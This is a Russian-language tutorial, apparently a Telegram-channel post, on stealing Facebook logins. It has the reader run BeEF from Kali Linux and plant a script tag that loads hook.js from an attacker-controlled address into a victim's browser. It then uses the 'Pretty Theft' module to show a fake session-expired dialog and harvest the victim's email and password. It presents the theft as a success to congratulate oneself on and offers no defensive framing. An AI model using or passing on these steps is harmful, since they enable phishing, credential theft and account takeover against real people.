Взлом Facebook
1. Устанавливаем Kali Linux.
Делаем Kali в виде автономной операционной системы. Можно так же с двойной загрузки с вашей системой Windows или Mac, или же на виртуальной машине внутри выбранной вами операционной системы. Но НЕ используйте для этих целей Windows!
В Kali имеется приложение под названием Browser Exploitation Framework (BeEF) (кликабельно)
С помощью него мы взломаем браузер жертвы и возьмем его под свой контроль. При получении доступа к браузеру мы может творить что нам только вздумается, но данной статьи продемонстрированно, как обманным путем заставить жертву выдать свои учетные данные от Facebook.
2. Открываем BeEF.
Запускаем Kali, появится экран как в примере ниже. Далее запускаем BeEF, кликая на значок быка.
После нажатия BeEF откроетоткрывая терминал.
После запуска BeEF открываем браузер IceWeasel, получая доступ к его интерфейсу. По желания заходим в BeEF, используя имя пользователя beef и пароль beef.
Видим следующее:
3. Подключаем браузер жертвы.
Наша задача - заставить жертву щелкнуть по специально разработанной ссылке JavaScript, чтобы «зацепить» их браузер. Это может быть реализовано различными способами, например:
Вставить код на ваш сайт и заставить пользователя нажать на него. Это может быть сделано с помощью такого текста, как «Нажмите здесь для получения дополнительной информации» и т.п.
Вставьте его в веб-страницу, и когда кто-то нажимает на него, у вас есть свой браузер! (
<script src= "http://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>
Дальше я буду отталкиваться оттого, что вы «зацепили» браузер жертвы и готовы владеть им.
4. Отправляем диалоговое окно жертве.
После подключения браузера жертвы, его IP, значки операционной системы и типа браузера появятся на панели «Подключенные браузеры» слева.
Если мы кликнем на подключенный браузер, он выдаст интерфейс BeEF справа. Заметьте, что это дает нам детали браузера изначально. Он также предоставляет нам ряд вкладок. Нам интересна вкладка «Commands».
Жмем на вкладку «Commands», далее прокручиваем ниже «Modules Tree», пока не наткнемся на «Social Engineering», после щелкаем, разварачивая его. Здесь будут указаны различные модули социальной инженерии. Жмем «Pretty Theft», открывая «History Results Module» и «Pretty Theft».
Данный модуль позволит нам отправить всплывающее окно в браузере пользователя. Мы же используем диалоговое окно Facebook.
Кликнув по «Dialog Type», мы можем наблюдать, как этот модуль может создавать не только диалоговое окно Facebook, но также LinkedIn, Windows, YouTube, Yammer и универсальное диалоговое окно. Выбираем тип диалога Facebook, затем нажмите кнопку «Execute».
5. Диалоговое окно появляется в целевой системе.
После нажатия на «Execute» в BeEF, в браузере жертвы появляется диалоговое, примерно как в примере ниже. Данное окно сообщает жертве, что срок их сеанса в Facebook истек, и для дальнейшего пользования Facebook необходимо ввести свой Email и пароль.
Вы можете сказать, что это похоже на бред и никто на это не поведется. Но вы - не большинство. Большинство введут свои данные.
6. Собираем учетные данные.
Возвращаемся в BeEf и наблюдаем - учетные данные появились в окне «Command results».
Жертва попалась на крючок, можете поздравить себя.
НЕ ЗАБУДЬ ПОДПИСАТЬСЯ НА НАС👇🏻
https://t.me/joinchat/AAAAAEacVl4rwVEwFjnH9A